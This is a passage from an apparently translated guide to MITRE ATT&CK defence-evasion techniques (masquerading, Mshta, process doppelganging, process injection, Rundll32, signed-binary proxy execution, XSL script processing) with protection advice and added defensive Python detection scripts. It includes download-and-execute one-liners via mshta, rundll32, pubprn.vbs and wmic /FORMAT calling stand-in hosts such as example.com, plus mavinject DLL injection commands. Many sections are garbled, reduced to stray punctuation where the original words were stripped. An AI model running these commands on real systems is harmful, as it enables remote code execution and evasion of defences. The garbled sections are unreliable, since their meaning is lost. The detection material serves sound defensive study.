: Launch Agents Launch Deamons . KnockKnock , launchctl Launch Agents Launch Deamons.

Masquerading


System: Windows, Linux, macOS
: , , . .
, , . . , , .

Windows
— , rundll32.exe. , , .
Windows C:\Windows\System32. , explorer.exe svchost.exe .

Linux
, , . Linux /bin, rsyncd dbus-inotifier.

: . . , C:\Windows\System32. .

- , .

Modify Registry


System: Windows
: , , system
: .

. Reg . , Windows API.

, , . Reg API . , , .

, Remote Regisry service. , , Windows Admin Shares RPC.

: , ( Service Registry Permissions Weakness ). , . , . (Event ID4657), , , RegHide, .

Mshta


System: Windows
:
: Mshta.exe ( C:\Windows\System32\ ) — , Microsoft HTML (*.HTA). HTA- , InternetExplorer, . , Mshta mshta.exe - HTA-, Javascript VBScript. :

mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

, URL-:

mshta http[:]//webserver/payload[.]hta

: mshta.exe IE, . Mshta.exe, .

NTFS File Attributes


System: Windows
Description: An NTFS partition contains the Master File Table (MFT), which stores data about the volume's contents: rows correspond to files and columns to their attributes. These include Extended Attributes (EA), up to 64 KB per entry, and Alternate Data Streams (ADS), arbitrarily sized metadata that can hold any data. Attackers can store malicious data and binaries in extended attributes and file metadata. This technique bypasses some protection tools, such as scanners based on static indicators and some anti-virus tools.

Protection recommendations: Blocking access to EA and ADS is difficult and impractical and can destabilize standard OS functionality. Direct protection efforts at preventing the launch of software that can be used to hide information in EA and ADS.
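Alternate data streams are invisible to a normal directory listing but `dir /r` (a real cmd.exe option) prints each file's named streams on their own lines as `<size> <file>:<stream>:$DATA`. The following is an added example, not code from the article: it parses such a listing and reports every stream other than Zone.Identifier, which browsers write for downloaded files and which is therefore expected. The listing is constructed.

```python
"""Find alternate data streams in the output of `dir /r`.

Added example, not from the original article. `dir /r` lists named streams
as "<size> <file>:<stream>:$DATA"; the listing below is constructed.
Zone.Identifier streams are treated as expected; everything else is reported.
"""
import re

STREAM_RE = re.compile(r"^\s*([\d,]+)\s+(.+?):([^:\\]+):\$DATA\s*$")
EXPECTED_STREAMS = {"zone.identifier"}

SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Directory of C:\\Users\\bob\\Downloads

01/15/2019  10:22 AM    <DIR>          .
01/15/2019  10:22 AM            12,345 report.docx
                                    26 report.docx:Zone.Identifier:$DATA
01/15/2019  10:25 AM               512 notes.txt
                                73,728 notes.txt:payload.exe:$DATA
01/15/2019  10:30 AM             4,096 image.png
                                   118 image.png:cfg:$DATA
               3 File(s)         17,000 bytes
"""


def parse_streams(listing):
    """Return [(file, stream, size_bytes)] for every named-stream line."""
    found = []
    for line in listing.splitlines():
        m = STREAM_RE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            found.append((m.group(2), m.group(3), size))
    return found


def suspicious_streams(listing, expected=EXPECTED_STREAMS):
    """Streams other than the expected ones, largest first."""
    hits = [s for s in parse_streams(listing) if s[1].lower() not in expected]
    return sorted(hits, key=lambda s: s[2], reverse=True)


if __name__ == "__main__":
    for file, stream, size in suspicious_streams(SAMPLE_DIR_R):
        print(f"{file}:{stream} ({size} bytes)")
```

A stream whose size is close to that of an executable, as with notes.txt above, is the case worth opening first; on a live system the same information is available from PowerShell's `Get-Item -Stream *`.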

Network Share Connection Removal


System: Windows
Rights: Administrator, user
Description: Network folder and Windows admin share connections can be removed when they are no longer needed. The net utility is one example of a tool that can delete network connections: net use \\system\share /delete. Adversaries can remove network connections they no longer need in order to clear traces of the intrusion.

Protection recommendations: Follow best practices for managing Windows admin shares. Identify unnecessary system utilities and software that can be used to connect to network shares and consider auditing or blocking their use.

Obfuscated Files or Information


System: Windows, Linux, macOS
Description: Attackers can use encryption, encoding and various methods of obfuscating files and their contents, both on the system and in transit.
Payloads can be archived or encrypted; sometimes deobfuscating and launching them requires user action, for example entering a password to open an archive prepared by the attacker.

Parts of files can also be encoded to hide plain-text strings. Payloads can be split into separate "benign" files that perform the malicious functionality once assembled.

Adversaries can also obfuscate commands invoked from payloads directly or via the command-line interface. Environment variables, aliases and platform- or language-specific symbols can be used to evade signature-based and whitelist-based malware detection.

Another example of obfuscation is steganography, the technique of hiding data or code in images, audio, video and text files.

Protection recommendations: Use malware analysis and detection tools that check not only the source code itself but also the process of command execution. On Windows 10 this functionality is provided by the Antimalware Scan Interface (AMSI).

The presence of escape characters in commands, such as ^ or ", can indicate obfuscation. With Windows Sysmon and Event ID 4688 you can view the arguments of commands executed by processes.

Obfuscation used in payloads at the initial access stage can be detected on the network with an IDS and email security gateways that identify compressed and encrypted data and scripts in attachments. Payloads delivered over an encrypted connection from a website can be detected by inspecting the encrypted traffic.
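Three of the indicators given in this article are visible in process-creation events (Sysmon Event ID 1 or Security Event ID 4688): launches of C:\Windows\System32\cmstp.exe (CMSTP section), certutil used to decode a file (Deobfuscate/Decode section) and caret-escaped command lines (the ^ indicator above). The block below is an added example, not code from the article or from Sysmon: it encodes those three rules and runs them over events constructed as simple key=value lines; real 4688 and Sysmon events carry the same fields under other names, so only `parse_event` would change.

```python
"""Rules over process-creation events for three indicators from the article.

Added example, not part of the original article. Events are constructed as
key=value lines with the fields Image, CommandLine and Parent; a real
Sysmon/4688 collector would supply the same fields under its own names.
"""
import re

SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\cmstp.exe CommandLine="cmstp.exe /ni /s C:\\Users\\bob\\AppData\\Local\\Temp\\profile.inf" Parent=C:\\Windows\\System32\\cmd.exe',
    'Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil -decode C:\\Users\\bob\\cert.txt C:\\Users\\bob\\tool.exe" Parent=C:\\Windows\\System32\\cmd.exe',
    'Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd /c p^o^w^e^r^s^h^e^l^l -nop -w hidden" Parent=C:\\Windows\\explorer.exe',
    'Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil -verify C:\\Users\\bob\\cert.cer" Parent=C:\\Windows\\System32\\cmd.exe',
    'Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe notes.txt" Parent=C:\\Windows\\explorer.exe',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Return {field: value} from a key=value line (quoted values allowed)."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def caret_ratio(cmd):
    """Share of characters that are carets. cmd.exe strips ^ before running a
    command, so a high share means the logged text differs from what executes."""
    return cmd.count("^") / len(cmd) if cmd else 0.0


def classify(event, caret_threshold=0.1):
    """Return the names of the rules the event triggers."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    hits = []
    if image.endswith("\\cmstp.exe"):
        hits.append("cmstp_launch")
    if image.endswith("\\certutil.exe") and re.search(r"\s-(decode|decodehex)\b", cmd, re.I):
        hits.append("certutil_decode")
    if caret_ratio(cmd) >= caret_threshold:
        hits.append("caret_obfuscation")
    return hits


def run_rules(lines):
    """Return [(event_index, hits)] for events that trigger at least one rule."""
    results = []
    for i, line in enumerate(lines):
        hits = classify(parse_event(line))
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for i, hits in run_rules(SAMPLE_EVENTS):
        print(i, hits, SAMPLE_EVENTS[i])
```

The caret threshold is a tuning knob: legitimate batch files use an occasional ^ for line continuation, which stays far below 10% of the command text.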

Plist Modification


System: macOS
Rights: User, Administrator
Description: Criminals can modify plist files by adding their own code to them so that it executes in the context of another user. Property list (plist) files located in /Library/Preferences run with elevated privileges, while plists in ~/Library/Preferences run with user privileges.

Security Tips: Prevent plist files from being modified by making them read-only.

Port knocking


System: Linux, macOS
Rights: User
Description: Attackers can use port knocking to hide the open ports they use to connect to the system.

Security Tips: Stateful firewalls can prevent some port knocking variants from working.

Process doppelganging


System: Windows
Rights: User, Administrator, System
Description: Transactional NTFS (TxF) is a technology first introduced in Windows Vista that allows file operations to be performed as transactions. In TxF only one transacted handle can write to a file at a time; all other handles are isolated and can only read the version of the file that was committed at the moment they were opened. If the system or application crashes, TxF automatically rolls back the changes to the file. TxF is still enabled in Windows 10.

The Process Doppelganging technique (from the German "Doppelgänger", a double or look-alike) uses undocumented WinAPI features and is performed in 4 steps:

  1. Transact. An NTFS transaction is created using the targeted executable file, and a temporarily modified version of the executable is created within the transaction.
  2. Load. A shared section is created in memory, into which the modified version of the executable is loaded.
  3. Rollback. The NTFS transaction is rolled back, so that the original targeted file remains on disk in its original form.
  4. Animate. A process is created from the modified version of the executable that remains in RAM, and its execution is started.

As a result, the malicious code runs in the context of a legitimate trusted process. Since the attack takes place only in memory, because the NTFS transaction is never committed but rolled back, no traces of malicious activity remain on disk.

Security Tips: Preventive measures that block certain API calls are likely to have negative side effects. Defence should instead aim at preventing the launch of the attacker's tools at an earlier stage of the attack chain. Doppelganging can be used to circumvent protection, but it is still good practice to block potentially dangerous applications and restrict the software in use with whitelists. The attack can be detected by analysing calls to the CreateTransaction, CreateFileTransacted and RollbackTransaction API functions, undocumented functions such as NtCreateProcessEx and NtCreateThreadEx, and API calls used to modify memory in another process, such as WriteProcessMemory.
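The API-call correlation suggested above, as an added example that is not from the article: it tracks, per process, the ordered chain CreateTransaction → CreateFileTransacted → RollbackTransaction → NtCreateProcessEx and treats CommitTransaction as the benign outcome; the (pid, api, detail) telemetry format is an assumption and the trace is constructed.

```python
"""Correlate per-process API-call telemetry for the Process Doppelganging
sequence. Added example, not from the article; the (pid, api, detail) trace
format is an assumption and the trace below is constructed."""
from collections import defaultdict

# The ordered chain that distinguishes Doppelganging from ordinary TxF use: a
# transacted write that is rolled back, followed by process creation anyway.
CHAIN = ("CreateTransaction", "CreateFileTransacted", "RollbackTransaction",
         "NtCreateProcessEx")
# Committing the transaction is the legitimate outcome and resets the chain.
RESET_ON = {"CommitTransaction"}

def advance(state, api):
    """Move one pid's chain pointer forward if api is the next expected call."""
    if api in RESET_ON:
        return 0
    if state < len(CHAIN) and api == CHAIN[state]:
        return state + 1
    return state

def detect(trace):
    """Return {pid: transacted file} for every pid that completed the chain in order."""
    progress = defaultdict(int)
    transacted_file = {}
    flagged = {}
    for pid, api, detail in trace:
        if api == "CreateFileTransacted":
            transacted_file[pid] = detail
        progress[pid] = advance(progress[pid], api)
        if progress[pid] == len(CHAIN):
            flagged[pid] = transacted_file.get(pid, "")
            progress[pid] = 0  # count each full sequence separately
    return flagged

# Constructed trace: (pid, api, detail). Unrelated calls in between are expected.
SAMPLE_TRACE = [
    (1204, "CreateTransaction", ""),          # benign: installer updating a file
    (1204, "CreateFileTransacted", r"C:\Program Files\App\app.cfg"),
    (1204, "WriteFile", ""),
    (1204, "CommitTransaction", ""),
    (3381, "CreateTransaction", ""),          # doppelganging chain
    (3381, "CreateFileTransacted", r"C:\Temp\legit.exe"),
    (3381, "WriteFile", "<payload>"),
    (3381, "NtCreateSection", ""),
    (3381, "RollbackTransaction", ""),
    (3381, "NtCreateProcessEx", ""),
    (3381, "NtCreateThreadEx", ""),
    (4417, "CreateTransaction", ""),          # benign: write failed, rolled back
    (4417, "CreateFileTransacted", r"C:\Temp\report.docx"),
    (4417, "RollbackTransaction", ""),
]
```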

Process Hollowing


System: Windows
Rights: User
Description: The attack replaces the executable image of a process while the process is suspended. It is one of the ten process injection techniques described in the Process Injection section below.

Security Tips: Preventive measures that block certain API calls are likely to have negative side effects. Defence should instead aim at preventing the launch of the attacker's tools at an earlier stage of the attack chain. Process Hollowing can be used to bypass security tools, but it is still good practice to block potentially dangerous applications and restrict the software in use with whitelists.

Code Injection into Process (Process Injection), Ten Process Injection Techniques


System: Windows, Linux, macOS
Rights: User, administrator, system, root
Description: Process injection is a method of executing arbitrary code in the address space of another live process. Running code in the context of another process gives access to that process's memory, to system and network resources, and possibly to elevated privileges. Process injection can also be used to evade detection of malicious activity by security tools. Injection techniques abuse the various OS mechanisms that support multithreaded program execution. Some approaches to injecting code into a process are listed below.

Windows
• DLL injection. Performed by writing the path to a malicious DLL inside the target process and then executing it by creating a remote thread (a remote thread is a thread that runs in the virtual address space of another process). In other words, the malware writes a DLL to disk and then uses a function such as CreateRemoteThread, which calls LoadLibrary in the injected process.
• PE injection (Portable executable injection) abuses the in-memory execution features of PE files such as DLLs or EXEs. Malicious code is written into the process without writing any file to disk, and its execution is then triggered either by additional code of its own or by creating a remote thread.
• Thread execution hijacking injects malicious code, or the path to a DLL, directly into a thread of the process. As with Process Hollowing, the thread must first be suspended.
• Asynchronous Procedure Call (APC) injection attaches malicious code to the APC queue of a process thread. One APC injection method, called "Early Bird injection", creates a suspended process into which malicious code can be written and then launched at the process entry point via APC. AtomBombing is another variant that uses APC to invoke malicious code previously written into the global atom table.
• Thread Local Storage (TLS) injection manipulates memory pointers inside the executable PE file to redirect the process to the malicious code.

Mac and Linux
• The environment variables LD_PRELOAD and LD_LIBRARY_PATH (Linux), DYLD_INSERT_LIBRARIES (macOS) or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) into a process, which in turn can be used to intercept API calls of running processes.
• The ptrace system call can be used to attach to a running process and modify it while it runs.
• /proc/[pid]/mem provides access to process memory and can be used to read and write arbitrary data, but this method is rarely used because of the complexity of its implementation.
• VDSO (virtual dynamic shared object) hijacking allows code injection during execution of ELF binaries by manipulating code stubs from linux-vdso.so.

Malware typically uses process injection to gain access to system resources, through which an attacker can gain a foothold in the system and make further changes in the attacked environment. More sophisticated samples perform multiple process injections to make detection harder.

Protection recommendations: Process injection techniques abuse regular OS functions, and interfering with those functions directly can destabilise legitimate software and security products. Efforts to prevent injection techniques should focus on earlier stages of the attack chain. Use tools that block potentially dangerous software, such as AppLocker. Use Yama as a preventive measure against ptrace-based injection, restricting ptrace to privileged users only. Additional measures include deploying kernel security modules that provide advanced access control and process restrictions, such as SELinux, grsecurity and AppArmor.
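An added audit script for the Linux-side primitives above (not from the article): it reads Yama's ptrace_scope and scans /proc/[pid]/environ for LD_PRELOAD-style variables; the sample environ block is constructed.

```python
"""Audit the Linux-side injection primitives listed above: Yama's ptrace_scope
and LD_PRELOAD-style variables in live process environments. Added example, not
from the article; the sample environ block is constructed."""
import os
from pathlib import Path

# Variables that make the dynamic loader pull an extra library into a process
# (DYLD_INSERT_LIBRARIES is the macOS counterpart; macOS has no /proc to walk).
PRELOAD_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH", "DYLD_INSERT_LIBRARIES")
PTRACE_SCOPE = {
    0: "classic: any process may ptrace another of the same uid",
    1: "restricted: only descendants (or PR_SET_PTRACER targets)",
    2: "admin-only: CAP_SYS_PTRACE required",
    3: "ptrace attach disabled",
}

def parse_environ(raw):
    """Parse the NUL-separated KEY=VALUE block of /proc/[pid]/environ into a dict."""
    pairs = (e.split(b"=", 1) for e in raw.split(b"\0") if b"=" in e)
    return {k.decode(errors="replace"): v.decode(errors="replace") for k, v in pairs}

def preload_findings(env):
    """Return [(var, value)] for the loader-injection variables present in env."""
    return [(var, env[var]) for var in PRELOAD_VARS if var in env]

def ptrace_scope(path="/proc/sys/kernel/yama/ptrace_scope"):
    """Return (value, meaning); value is None when Yama is not available."""
    try:
        value = int(Path(path).read_text().strip())
    except (OSError, ValueError):
        return None, "Yama not available: ptrace is limited only by uid checks"
    return value, PTRACE_SCOPE.get(value, "unknown value")

def scan_processes(proc="/proc"):
    """Map pid -> findings for every readable process whose environment sets a preload var."""
    hits = {}
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            raw = Path(proc, entry, "environ").read_bytes()
        except OSError:  # kernel threads, exited pids, or other users' processes
            continue
        found = preload_findings(parse_environ(raw))
        if found:
            hits[int(entry)] = found
    return hits

# Constructed /proc/[pid]/environ content, as read_bytes() would return it.
SAMPLE_ENVIRON = b"PATH=/usr/bin:/bin\0LD_PRELOAD=/tmp/.cache/libhook.so\0HOME=/home/svc\0"
```

Run as root to see every process; as an unprivileged user, scan_processes() silently skips environ files it cannot read.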

Redundant Access


System: Windows, Linux, macOS
Rights: User, Administrator, System
Description: Attackers can use several remote access tools with different control protocols at the same time to spread the risk of detection. If one remote access tool is detected and blocked but the defending side has not identified all of the attacker's tools, remote access to the attacked network is preserved. Attackers may also try to obtain valid accounts for corporate remote services such as VPN, to have an alternative way into the system if the primary remote access tools are blocked. A web shell is another method of remote access to the network via a web server.

Protection recommendations: Monitor for the presence of known remote access tools (AmmyAdmin, Radmin, RemotePC, VNC, etc.) on your network and block their launch; use application launch control and tools that block potentially dangerous software. Deploying IDS and IPS systems that identify specific malware by signature reduces the likelihood of a successful attack, but over time attackers modify their tools to change the signature and so bypass the IDS and IPS.

Regsvcs / Regasm


System: Windows
Rights: User, Administrator
Description: Regsvcs and Regasm are Windows command-line utilities used to register .NET Component Object Model (COM) assemblies. Both binaries are digitally signed by Microsoft. Criminals can use Regsvcs and Regasm to proxy code execution by placing the code that must run before registration or unregistration in a method marked with the [ComRegisterFunction] or [ComUnregisterFunction] attribute. Code with these attributes runs even if the process is executed with insufficient privileges or even "crashes" at startup.

Security Tips: Block Regsvcs.exe and Regasm.exe if they are not used on your system or network.

Rootkit


System: Windows, Linux, macOS
Rights: Administrator, System, root
Description: Rootkits are programs that hide the presence of malware by intercepting and modifying API calls. Rootkits can operate at user level, in the OS kernel, or even lower, at the hypervisor, MBR or system firmware level. Adversaries use rootkits to hide the presence of programs, files, network connections, drivers and other OS components.

Protection recommendations: Identify and block potentially dangerous software that may contain rootkits using software whitelisting tools, anti-virus tools, or built-in OS protection.

Rundll32 (Poweliks)


System: Windows
Rights: User
Description: Rundll32.exe is a system utility for running programs from dynamic link libraries. It can be invoked to proxy execution of a binary and to execute Control Panel files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes Rundll32.exe to run. Rundll32 can also be used to execute scripts such as JavaScript:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")

The above method of using rundll32.exe is detected by antivirus software as the Poweliks malware.

Protection Tips: Attack Surface Reduction (ASR) in EMET and Advanced Threat Protection in Windows Defender can block the use of Rundll32.exe to bypass whitelists.

SIP and Trust Provider Capture (SIP and Trust Provider Hijacking) or Subverting Trust in Windows


System: Windows
Rights: Administrator, System
Description: Attackers can modify the components of the Windows code-signing and signature-verification architecture in order to bypass launch-control tools that allow only signed code to run. To create, sign and verify signatures of files of various formats, Windows uses so-called Subject Interface Packages (SIPs): software specifications, unique to each file type, that mediate between the API functions that initiate the creation, calculation and verification of signatures and the files themselves. The validity of a signature is confirmed by a so-called Trust Provider, the operating-system software components that carry out the various procedures related to calculating and verifying digital signatures.

Popular attack methods:

, Windows DLL (DLL Search Order Hijacking).

: , , SIP Trust Provider. SIP. DLL, , Windows AppLocker DeviceGuard.

Scripting


System: Windows, Linux, macOS
:
: , , , , . API . Office . , . — Metasploit, Veil, PowerSploit.

: , VBScript PowerShell. Windows MS Office GPO. , . , , Sandboxie Windows Apparmor, Docker Linux.

Signed Binary Proxy Execution


System: Windows
:
: , , Windows, . Microsoft, Windows, :

• Mavinject.exe — Windows, . Mavinject DLL :
«C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe» [PID] /INJECTRUNNING [PATH DLL];
C:\Windows\system32\mavinject.exe [PID] /INJECTRUNNING [PATH DLL];
• SyncAppvPublishingServer.exe — powershell- powershell.exe.
.

: , .

Signed Script Proxy Execution


System: Windows
:
: , , , , PubPrn.vbs Microsoft :
cscript C:\Windows\System32\Printing_Admin_Scripts\ru-RU\pubprn.vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

: , .

Software Packing


System: Windows
: , , . . — MPRESS UPS, , , , , . , .

: , , . - .

Space after Filename


System: Linux, macOS
:
: , . ( .app) . , Mach-O evil.bin, Terminal.app . evil.txt, . , «evil.txt » ( ), . .

: , .. , , , .

Timestomp


System: Windows, Linux
: , , System
: Timestomp — (, , ). , , . , .

: - . .

Trusted Developer Utilities


System: Windows
:
: , , - . , .
• MSBuild — , Visual Studio. XML-, . MSBuild .NET 4 C# XML-, . MSBuild.exe Microsoft.
• DNX — .Net Execution Environment (dnx.exe) (development kit) Visual Studio Enterprise. .NET Core CLI 2016 . DNX Windows .Net Core ASP.NET Core 1.0. Dnx.exe - .
• RCSI — C#, csi.exe. Roslyn .Net. Rcsi.exe Microsoft. C# .csx Rcsi.exe Windows.
• WinDbg/CDB — MS Windows user-mode. Microsoft cdb.exe user-mode. . , - Windows. WinDbg.exe CDB.exe Microsoft .
• Tracker — tracker.exe. .NET MSBuild. Windows 10. tracker.exe DLL . Tracker.exe Microsoft.

: , .

Valid Accounts


: , . , VPN, OWA, . , . .

: , . , , . SIEM-.

Web Service


System: Windows
:
: , Web- . Command and control (&C 2). - C2, Google Twitter. . - SSL/TLS, .

: - . IDS/IPS-, , . , C2 , . .

XSL Script Processing


System: Windows
:
: Extensible Stylesheet Language (*.xsl), , XML-. XSL . , . (Trusted Developer Utilities), msxsl.exe, XML- (html, wml, rtf, pdf ..) JavaScript, ( URL-) XSL-. msxsl.exe , . msxsl.exe:
msxsl.exe customers[.]xml script[.]xsl .
, Squiblytwo, WMI JScript VBScript xsl-. , Squiblydoo, regsrv32.exe, Windows:
• : wmic process list /FORMAT:evil[.]xsl;
• : wmic os get /FORMAT:«https[:]//example[.]com/evil[.]xsl».

: msxsl.exe, . WMI , .

Source: https://habr.com/ru/post/432624/

